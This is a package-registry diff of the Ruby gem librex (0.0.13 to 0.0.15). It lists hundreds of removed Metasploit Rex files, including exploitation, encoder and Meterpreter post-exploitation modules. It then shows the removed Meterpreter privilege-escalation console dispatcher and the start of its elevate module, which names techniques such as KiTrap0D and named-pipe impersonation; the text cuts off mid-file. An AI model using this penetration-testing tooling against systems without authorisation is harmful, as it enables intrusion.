librex 0.0.13 → 0.0.15

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (435) hide show
  1. data/README.markdown +1 -1
  2. data/Rakefile +1 -0
  3. metadata +3 -435
  4. data/lib/rex/LICENSE +0 -29
  5. data/lib/rex/arch.rb +0 -103
  6. data/lib/rex/arch/sparc.rb +0 -75
  7. data/lib/rex/arch/sparc.rb.ut.rb +0 -18
  8. data/lib/rex/arch/x86.rb +0 -513
  9. data/lib/rex/arch/x86.rb.ut.rb +0 -93
  10. data/lib/rex/assembly/nasm.rb +0 -104
  11. data/lib/rex/assembly/nasm.rb.ut.rb +0 -22
  12. data/lib/rex/codepage.map +0 -104
  13. data/lib/rex/compat.rb +0 -311
  14. data/lib/rex/constants.rb +0 -113
  15. data/lib/rex/elfparsey.rb +0 -11
  16. data/lib/rex/elfparsey/elf.rb +0 -123
  17. data/lib/rex/elfparsey/elfbase.rb +0 -258
  18. data/lib/rex/elfparsey/exceptions.rb +0 -27
  19. data/lib/rex/elfscan.rb +0 -12
  20. data/lib/rex/elfscan/scanner.rb +0 -207
  21. data/lib/rex/elfscan/search.rb +0 -46
  22. data/lib/rex/encoder/alpha2.rb +0 -31
  23. data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -68
  24. data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -79
  25. data/lib/rex/encoder/alpha2/generic.rb +0 -114
  26. data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -117
  27. data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -129
  28. data/lib/rex/encoder/ndr.rb +0 -89
  29. data/lib/rex/encoder/ndr.rb.ut.rb +0 -44
  30. data/lib/rex/encoder/nonalpha.rb +0 -61
  31. data/lib/rex/encoder/nonupper.rb +0 -64
  32. data/lib/rex/encoder/xdr.rb +0 -106
  33. data/lib/rex/encoder/xdr.rb.ut.rb +0 -29
  34. data/lib/rex/encoder/xor.rb +0 -69
  35. data/lib/rex/encoder/xor/dword.rb +0 -13
  36. data/lib/rex/encoder/xor/dword_additive.rb +0 -13
  37. data/lib/rex/encoders/xor_dword.rb +0 -35
  38. data/lib/rex/encoders/xor_dword_additive.rb +0 -53
  39. data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -12
  40. data/lib/rex/encoding/xor.rb +0 -20
  41. data/lib/rex/encoding/xor.rb.ts.rb +0 -14
  42. data/lib/rex/encoding/xor/byte.rb +0 -15
  43. data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -21
  44. data/lib/rex/encoding/xor/dword.rb +0 -21
  45. data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -15
  46. data/lib/rex/encoding/xor/dword_additive.rb +0 -92
  47. data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -15
  48. data/lib/rex/encoding/xor/exceptions.rb +0 -17
  49. data/lib/rex/encoding/xor/generic.rb +0 -146
  50. data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -120
  51. data/lib/rex/encoding/xor/qword.rb +0 -15
  52. data/lib/rex/encoding/xor/word.rb +0 -21
  53. data/lib/rex/encoding/xor/word.rb.ut.rb +0 -13
  54. data/lib/rex/exceptions.rb +0 -275
  55. data/lib/rex/exceptions.rb.ut.rb +0 -44
  56. data/lib/rex/exploitation/cmdstager.rb +0 -9
  57. data/lib/rex/exploitation/cmdstager/base.rb +0 -175
  58. data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -142
  59. data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -136
  60. data/lib/rex/exploitation/cmdstager/tftp.rb +0 -63
  61. data/lib/rex/exploitation/cmdstager/vbs.rb +0 -128
  62. data/lib/rex/exploitation/egghunter.rb +0 -277
  63. data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -25
  64. data/lib/rex/exploitation/encryptjs.rb +0 -77
  65. data/lib/rex/exploitation/heaplib.js.b64 +0 -331
  66. data/lib/rex/exploitation/heaplib.rb +0 -94
  67. data/lib/rex/exploitation/javascriptosdetect.rb +0 -897
  68. data/lib/rex/exploitation/obfuscatejs.rb +0 -335
  69. data/lib/rex/exploitation/omelet.rb +0 -320
  70. data/lib/rex/exploitation/omelet.rb.ut.rb +0 -13
  71. data/lib/rex/exploitation/opcodedb.rb +0 -818
  72. data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -279
  73. data/lib/rex/exploitation/seh.rb +0 -92
  74. data/lib/rex/exploitation/seh.rb.ut.rb +0 -19
  75. data/lib/rex/file.rb +0 -112
  76. data/lib/rex/file.rb.ut.rb +0 -16
  77. data/lib/rex/image_source.rb +0 -12
  78. data/lib/rex/image_source/disk.rb +0 -60
  79. data/lib/rex/image_source/image_source.rb +0 -46
  80. data/lib/rex/image_source/memory.rb +0 -37
  81. data/lib/rex/io/bidirectional_pipe.rb +0 -157
  82. data/lib/rex/io/datagram_abstraction.rb +0 -35
  83. data/lib/rex/io/stream.rb +0 -319
  84. data/lib/rex/io/stream_abstraction.rb +0 -197
  85. data/lib/rex/io/stream_server.rb +0 -211
  86. data/lib/rex/job_container.rb +0 -187
  87. data/lib/rex/logging.rb +0 -4
  88. data/lib/rex/logging/log_dispatcher.rb +0 -179
  89. data/lib/rex/logging/log_sink.rb +0 -42
  90. data/lib/rex/logging/sinks/flatfile.rb +0 -55
  91. data/lib/rex/logging/sinks/stderr.rb +0 -43
  92. data/lib/rex/machparsey.rb +0 -9
  93. data/lib/rex/machparsey/exceptions.rb +0 -34
  94. data/lib/rex/machparsey/mach.rb +0 -209
  95. data/lib/rex/machparsey/machbase.rb +0 -408
  96. data/lib/rex/machscan.rb +0 -9
  97. data/lib/rex/machscan/scanner.rb +0 -217
  98. data/lib/rex/mime.rb +0 -9
  99. data/lib/rex/mime/header.rb +0 -77
  100. data/lib/rex/mime/message.rb +0 -144
  101. data/lib/rex/mime/part.rb +0 -20
  102. data/lib/rex/nop/opty2.rb +0 -108
  103. data/lib/rex/nop/opty2.rb.ut.rb +0 -23
  104. data/lib/rex/nop/opty2_tables.rb +0 -300
  105. data/lib/rex/ole.rb +0 -205
  106. data/lib/rex/ole/clsid.rb +0 -47
  107. data/lib/rex/ole/difat.rb +0 -141
  108. data/lib/rex/ole/directory.rb +0 -231
  109. data/lib/rex/ole/direntry.rb +0 -240
  110. data/lib/rex/ole/docs/dependencies.txt +0 -8
  111. data/lib/rex/ole/docs/references.txt +0 -1
  112. data/lib/rex/ole/fat.rb +0 -99
  113. data/lib/rex/ole/header.rb +0 -204
  114. data/lib/rex/ole/minifat.rb +0 -77
  115. data/lib/rex/ole/propset.rb +0 -144
  116. data/lib/rex/ole/samples/create_ole.rb +0 -27
  117. data/lib/rex/ole/samples/dir.rb +0 -35
  118. data/lib/rex/ole/samples/dump_stream.rb +0 -34
  119. data/lib/rex/ole/samples/ole_info.rb +0 -23
  120. data/lib/rex/ole/storage.rb +0 -395
  121. data/lib/rex/ole/stream.rb +0 -53
  122. data/lib/rex/ole/substorage.rb +0 -49
  123. data/lib/rex/ole/util.rb +0 -157
  124. data/lib/rex/parser/arguments.rb +0 -97
  125. data/lib/rex/parser/arguments.rb.ut.rb +0 -67
  126. data/lib/rex/parser/ini.rb +0 -185
  127. data/lib/rex/parser/ini.rb.ut.rb +0 -29
  128. data/lib/rex/parser/ip360_aspl_xml.rb +0 -102
  129. data/lib/rex/parser/ip360_xml.rb +0 -93
  130. data/lib/rex/parser/nessus_xml.rb +0 -118
  131. data/lib/rex/parser/netsparker_xml.rb +0 -94
  132. data/lib/rex/parser/nexpose_xml.rb +0 -131
  133. data/lib/rex/parser/nmap_xml.rb +0 -121
  134. data/lib/rex/parser/retina_xml.rb +0 -109
  135. data/lib/rex/payloads.rb +0 -1
  136. data/lib/rex/payloads/win32.rb +0 -2
  137. data/lib/rex/payloads/win32/common.rb +0 -26
  138. data/lib/rex/payloads/win32/kernel.rb +0 -53
  139. data/lib/rex/payloads/win32/kernel/common.rb +0 -54
  140. data/lib/rex/payloads/win32/kernel/migration.rb +0 -12
  141. data/lib/rex/payloads/win32/kernel/recovery.rb +0 -50
  142. data/lib/rex/payloads/win32/kernel/stager.rb +0 -194
  143. data/lib/rex/peparsey.rb +0 -12
  144. data/lib/rex/peparsey/exceptions.rb +0 -32
  145. data/lib/rex/peparsey/pe.rb +0 -212
  146. data/lib/rex/peparsey/pe_memdump.rb +0 -63
  147. data/lib/rex/peparsey/pebase.rb +0 -1680
  148. data/lib/rex/peparsey/section.rb +0 -136
  149. data/lib/rex/pescan.rb +0 -13
  150. data/lib/rex/pescan/analyze.rb +0 -309
  151. data/lib/rex/pescan/scanner.rb +0 -206
  152. data/lib/rex/pescan/search.rb +0 -56
  153. data/lib/rex/platforms.rb +0 -1
  154. data/lib/rex/platforms/windows.rb +0 -51
  155. data/lib/rex/poly.rb +0 -132
  156. data/lib/rex/poly/block.rb +0 -477
  157. data/lib/rex/poly/register.rb +0 -100
  158. data/lib/rex/poly/register/x86.rb +0 -40
  159. data/lib/rex/post.rb +0 -8
  160. data/lib/rex/post/dir.rb +0 -51
  161. data/lib/rex/post/file.rb +0 -172
  162. data/lib/rex/post/file_stat.rb +0 -220
  163. data/lib/rex/post/gen.pl +0 -13
  164. data/lib/rex/post/io.rb +0 -182
  165. data/lib/rex/post/meterpreter.rb +0 -4
  166. data/lib/rex/post/meterpreter/channel.rb +0 -445
  167. data/lib/rex/post/meterpreter/channel_container.rb +0 -54
  168. data/lib/rex/post/meterpreter/channels/pool.rb +0 -160
  169. data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -62
  170. data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -103
  171. data/lib/rex/post/meterpreter/channels/stream.rb +0 -87
  172. data/lib/rex/post/meterpreter/client.rb +0 -364
  173. data/lib/rex/post/meterpreter/client_core.rb +0 -274
  174. data/lib/rex/post/meterpreter/dependencies.rb +0 -3
  175. data/lib/rex/post/meterpreter/extension.rb +0 -32
  176. data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -58
  177. data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -16
  178. data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -94
  179. data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -21
  180. data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +0 -57
  181. data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +0 -15
  182. data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -118
  183. data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -61
  184. data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -111
  185. data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -28
  186. data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +0 -101
  187. data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +0 -26
  188. data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -333
  189. data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -282
  190. data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +0 -266
  191. data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -103
  192. data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -48
  193. data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -144
  194. data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -73
  195. data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -56
  196. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +0 -137
  197. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +0 -180
  198. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -167
  199. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +0 -208
  200. data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -6
  201. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +0 -38106
  202. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -31
  203. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +0 -47
  204. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -36
  205. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +0 -1818
  206. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +0 -96
  207. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +0 -3848
  208. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +0 -26
  209. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +0 -153
  210. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +0 -21
  211. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +0 -3169
  212. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +0 -599
  213. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +0 -318
  214. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +0 -100
  215. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -42
  216. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +0 -148
  217. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -127
  218. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +0 -309
  219. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +0 -204
  220. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +0 -51
  221. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +0 -630
  222. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +0 -75
  223. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -103
  224. data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +0 -149
  225. data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -97
  226. data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -192
  227. data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -41
  228. data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -61
  229. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -370
  230. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -129
  231. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -55
  232. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -336
  233. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -141
  234. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -279
  235. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -193
  236. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -102
  237. data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -180
  238. data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +0 -211
  239. data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -227
  240. data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +0 -63
  241. data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -30
  242. data/lib/rex/post/meterpreter/object_aliases.rb +0 -83
  243. data/lib/rex/post/meterpreter/packet.rb +0 -688
  244. data/lib/rex/post/meterpreter/packet_dispatcher.rb +0 -431
  245. data/lib/rex/post/meterpreter/packet_parser.rb +0 -94
  246. data/lib/rex/post/meterpreter/packet_response_waiter.rb +0 -83
  247. data/lib/rex/post/meterpreter/ui/console.rb +0 -137
  248. data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -62
  249. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +0 -730
  250. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -108
  251. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -241
  252. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +0 -231
  253. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -61
  254. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -98
  255. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -51
  256. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -132
  257. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +0 -187
  258. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -65
  259. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +0 -442
  260. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +0 -298
  261. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -486
  262. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -315
  263. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +0 -157
  264. data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -95
  265. data/lib/rex/post/permission.rb +0 -26
  266. data/lib/rex/post/process.rb +0 -57
  267. data/lib/rex/post/thread.rb +0 -57
  268. data/lib/rex/post/ui.rb +0 -52
  269. data/lib/rex/proto.rb +0 -13
  270. data/lib/rex/proto.rb.ts.rb +0 -8
  271. data/lib/rex/proto/dcerpc.rb +0 -6
  272. data/lib/rex/proto/dcerpc.rb.ts.rb +0 -9
  273. data/lib/rex/proto/dcerpc/client.rb +0 -361
  274. data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -491
  275. data/lib/rex/proto/dcerpc/exceptions.rb +0 -150
  276. data/lib/rex/proto/dcerpc/handle.rb +0 -47
  277. data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -85
  278. data/lib/rex/proto/dcerpc/ndr.rb +0 -72
  279. data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -41
  280. data/lib/rex/proto/dcerpc/packet.rb +0 -253
  281. data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -56
  282. data/lib/rex/proto/dcerpc/response.rb +0 -187
  283. data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -15
  284. data/lib/rex/proto/dcerpc/uuid.rb +0 -84
  285. data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -46
  286. data/lib/rex/proto/dhcp.rb +0 -7
  287. data/lib/rex/proto/dhcp/constants.rb +0 -33
  288. data/lib/rex/proto/dhcp/server.rb +0 -292
  289. data/lib/rex/proto/drda.rb +0 -5
  290. data/lib/rex/proto/drda.rb.ts.rb +0 -17
  291. data/lib/rex/proto/drda/constants.rb +0 -49
  292. data/lib/rex/proto/drda/constants.rb.ut.rb +0 -23
  293. data/lib/rex/proto/drda/packet.rb +0 -252
  294. data/lib/rex/proto/drda/packet.rb.ut.rb +0 -109
  295. data/lib/rex/proto/drda/utils.rb +0 -123
  296. data/lib/rex/proto/drda/utils.rb.ut.rb +0 -84
  297. data/lib/rex/proto/http.rb +0 -5
  298. data/lib/rex/proto/http.rb.ts.rb +0 -12
  299. data/lib/rex/proto/http/client.rb +0 -821
  300. data/lib/rex/proto/http/client.rb.ut.rb +0 -95
  301. data/lib/rex/proto/http/handler.rb +0 -46
  302. data/lib/rex/proto/http/handler/erb.rb +0 -128
  303. data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -21
  304. data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
  305. data/lib/rex/proto/http/handler/proc.rb +0 -60
  306. data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -24
  307. data/lib/rex/proto/http/header.rb +0 -161
  308. data/lib/rex/proto/http/header.rb.ut.rb +0 -46
  309. data/lib/rex/proto/http/packet.rb +0 -407
  310. data/lib/rex/proto/http/packet.rb.ut.rb +0 -165
  311. data/lib/rex/proto/http/request.rb +0 -356
  312. data/lib/rex/proto/http/request.rb.ut.rb +0 -214
  313. data/lib/rex/proto/http/response.rb +0 -90
  314. data/lib/rex/proto/http/response.rb.ut.rb +0 -149
  315. data/lib/rex/proto/http/server.rb +0 -369
  316. data/lib/rex/proto/http/server.rb.ut.rb +0 -79
  317. data/lib/rex/proto/ntlm.rb +0 -7
  318. data/lib/rex/proto/ntlm.rb.ut.rb +0 -177
  319. data/lib/rex/proto/ntlm/base.rb +0 -326
  320. data/lib/rex/proto/ntlm/constants.rb +0 -74
  321. data/lib/rex/proto/ntlm/crypt.rb +0 -415
  322. data/lib/rex/proto/ntlm/exceptions.rb +0 -9
  323. data/lib/rex/proto/ntlm/message.rb +0 -533
  324. data/lib/rex/proto/ntlm/utils.rb +0 -763
  325. data/lib/rex/proto/proxy/socks4a.rb +0 -440
  326. data/lib/rex/proto/rfb.rb +0 -19
  327. data/lib/rex/proto/rfb.rb.ut.rb +0 -37
  328. data/lib/rex/proto/rfb/cipher.rb +0 -84
  329. data/lib/rex/proto/rfb/client.rb +0 -207
  330. data/lib/rex/proto/rfb/constants.rb +0 -52
  331. data/lib/rex/proto/smb.rb +0 -7
  332. data/lib/rex/proto/smb.rb.ts.rb +0 -8
  333. data/lib/rex/proto/smb/client.rb +0 -1952
  334. data/lib/rex/proto/smb/client.rb.ut.rb +0 -223
  335. data/lib/rex/proto/smb/constants.rb +0 -1047
  336. data/lib/rex/proto/smb/constants.rb.ut.rb +0 -18
  337. data/lib/rex/proto/smb/crypt.rb +0 -36
  338. data/lib/rex/proto/smb/evasions.rb +0 -66
  339. data/lib/rex/proto/smb/exceptions.rb +0 -858
  340. data/lib/rex/proto/smb/simpleclient.rb +0 -306
  341. data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -128
  342. data/lib/rex/proto/smb/utils.rb +0 -103
  343. data/lib/rex/proto/smb/utils.rb.ut.rb +0 -20
  344. data/lib/rex/proto/sunrpc.rb +0 -1
  345. data/lib/rex/proto/sunrpc/client.rb +0 -195
  346. data/lib/rex/proto/tftp.rb +0 -12
  347. data/lib/rex/proto/tftp/constants.rb +0 -39
  348. data/lib/rex/proto/tftp/server.rb +0 -497
  349. data/lib/rex/proto/tftp/server.rb.ut.rb +0 -28
  350. data/lib/rex/script.rb +0 -42
  351. data/lib/rex/script/base.rb +0 -59
  352. data/lib/rex/script/meterpreter.rb +0 -15
  353. data/lib/rex/script/shell.rb +0 -9
  354. data/lib/rex/service.rb +0 -48
  355. data/lib/rex/service_manager.rb +0 -141
  356. data/lib/rex/service_manager.rb.ut.rb +0 -32
  357. data/lib/rex/services/local_relay.rb +0 -423
  358. data/lib/rex/socket.rb +0 -684
  359. data/lib/rex/socket.rb.ut.rb +0 -107
  360. data/lib/rex/socket/comm.rb +0 -119
  361. data/lib/rex/socket/comm/local.rb +0 -412
  362. data/lib/rex/socket/comm/local.rb.ut.rb +0 -75
  363. data/lib/rex/socket/ip.rb +0 -130
  364. data/lib/rex/socket/parameters.rb +0 -345
  365. data/lib/rex/socket/parameters.rb.ut.rb +0 -51
  366. data/lib/rex/socket/range_walker.rb +0 -346
  367. data/lib/rex/socket/range_walker.rb.ut.rb +0 -55
  368. data/lib/rex/socket/ssl_tcp.rb +0 -184
  369. data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -39
  370. data/lib/rex/socket/ssl_tcp_server.rb +0 -122
  371. data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -61
  372. data/lib/rex/socket/subnet_walker.rb +0 -75
  373. data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -28
  374. data/lib/rex/socket/switch_board.rb +0 -278
  375. data/lib/rex/socket/switch_board.rb.ut.rb +0 -52
  376. data/lib/rex/socket/tcp.rb +0 -76
  377. data/lib/rex/socket/tcp.rb.ut.rb +0 -64
  378. data/lib/rex/socket/tcp_server.rb +0 -67
  379. data/lib/rex/socket/tcp_server.rb.ut.rb +0 -44
  380. data/lib/rex/socket/udp.rb +0 -164
  381. data/lib/rex/socket/udp.rb.ut.rb +0 -44
  382. data/lib/rex/struct2.rb +0 -5
  383. data/lib/rex/struct2/c_struct.rb +0 -181
  384. data/lib/rex/struct2/c_struct_template.rb +0 -39
  385. data/lib/rex/struct2/constant.rb +0 -26
  386. data/lib/rex/struct2/element.rb +0 -44
  387. data/lib/rex/struct2/generic.rb +0 -73
  388. data/lib/rex/struct2/restraint.rb +0 -54
  389. data/lib/rex/struct2/s_string.rb +0 -72
  390. data/lib/rex/struct2/s_struct.rb +0 -111
  391. data/lib/rex/sync.rb +0 -6
  392. data/lib/rex/sync/event.rb +0 -94
  393. data/lib/rex/sync/read_write_lock.rb +0 -176
  394. data/lib/rex/sync/ref.rb +0 -57
  395. data/lib/rex/sync/thread_safe.rb +0 -82
  396. data/lib/rex/test.rb +0 -35
  397. data/lib/rex/text.rb +0 -1149
  398. data/lib/rex/text.rb.ut.rb +0 -190
  399. data/lib/rex/thread_factory.rb +0 -42
  400. data/lib/rex/time.rb +0 -65
  401. data/lib/rex/transformer.rb +0 -115
  402. data/lib/rex/transformer.rb.ut.rb +0 -38
  403. data/lib/rex/ui.rb +0 -21
  404. data/lib/rex/ui/interactive.rb +0 -254
  405. data/lib/rex/ui/output.rb +0 -78
  406. data/lib/rex/ui/output/none.rb +0 -18
  407. data/lib/rex/ui/progress_tracker.rb +0 -96
  408. data/lib/rex/ui/subscriber.rb +0 -149
  409. data/lib/rex/ui/text/color.rb +0 -97
  410. data/lib/rex/ui/text/color.rb.ut.rb +0 -18
  411. data/lib/rex/ui/text/dispatcher_shell.rb +0 -467
  412. data/lib/rex/ui/text/input.rb +0 -117
  413. data/lib/rex/ui/text/input/buffer.rb +0 -75
  414. data/lib/rex/ui/text/input/readline.rb +0 -129
  415. data/lib/rex/ui/text/input/socket.rb +0 -95
  416. data/lib/rex/ui/text/input/stdio.rb +0 -45
  417. data/lib/rex/ui/text/irb_shell.rb +0 -57
  418. data/lib/rex/ui/text/output.rb +0 -80
  419. data/lib/rex/ui/text/output/buffer.rb +0 -61
  420. data/lib/rex/ui/text/output/file.rb +0 -43
  421. data/lib/rex/ui/text/output/socket.rb +0 -43
  422. data/lib/rex/ui/text/output/stdio.rb +0 -40
  423. data/lib/rex/ui/text/progress_tracker.rb +0 -56
  424. data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -34
  425. data/lib/rex/ui/text/shell.rb +0 -328
  426. data/lib/rex/ui/text/table.rb +0 -279
  427. data/lib/rex/ui/text/table.rb.ut.rb +0 -55
  428. data/lib/rex/zip.rb +0 -93
  429. data/lib/rex/zip/archive.rb +0 -184
  430. data/lib/rex/zip/blocks.rb +0 -182
  431. data/lib/rex/zip/entry.rb +0 -104
  432. data/lib/rex/zip/samples/comment.rb +0 -32
  433. data/lib/rex/zip/samples/mkwar.rb +0 -138
  434. data/lib/rex/zip/samples/mkzip.rb +0 -19
  435. data/lib/rex/zip/samples/recursive.rb +0 -58
@@ -1,61 +0,0 @@
1
- require 'rex/post/meterpreter'
2
-
3
- module Rex
4
- module Post
5
- module Meterpreter
6
- module Ui
7
-
8
- ###
9
- #
10
- # Privilege escalation extension user interface.
11
- #
12
- ###
13
- class Console::CommandDispatcher::Priv
14
-
15
- require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate'
16
- require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd'
17
- require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp'
18
-
19
- Klass = Console::CommandDispatcher::Priv
20
-
21
- Dispatchers =
22
- [
23
- Klass::Elevate,
24
- Klass::Passwd,
25
- Klass::Timestomp,
26
- ]
27
-
28
- include Console::CommandDispatcher
29
-
30
- #
31
- # Initializes an instance of the priv command interaction.
32
- #
33
- def initialize(shell)
34
- super
35
-
36
- Dispatchers.each { |d|
37
- shell.enstack_dispatcher(d)
38
- }
39
- end
40
-
41
- #
42
- # List of supported commands.
43
- #
44
- def commands
45
- {
46
- }
47
- end
48
-
49
- #
50
- # Name for this dispatcher
51
- #
52
- def name
53
- "Privilege Escalation"
54
- end
55
-
56
- end
57
-
58
- end
59
- end
60
- end
61
- end
@@ -1,98 +0,0 @@
1
- require 'rex/post/meterpreter'
2
-
3
- module Rex
4
- module Post
5
- module Meterpreter
6
- module Ui
7
-
8
- ###
9
- #
10
- # The local privilege escalation portion of the extension.
11
- #
12
- ###
13
- class Console::CommandDispatcher::Priv::Elevate
14
-
15
- Klass = Console::CommandDispatcher::Priv::Elevate
16
-
17
- include Console::CommandDispatcher
18
-
19
- ELEVATE_TECHNIQUE_NONE = -1
20
- ELEVATE_TECHNIQUE_ANY = 0
21
- ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
22
- ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
23
- ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
24
- ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
25
-
26
- ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
27
- "Service - Named Pipe Impersonation (In Memory/Admin)",
28
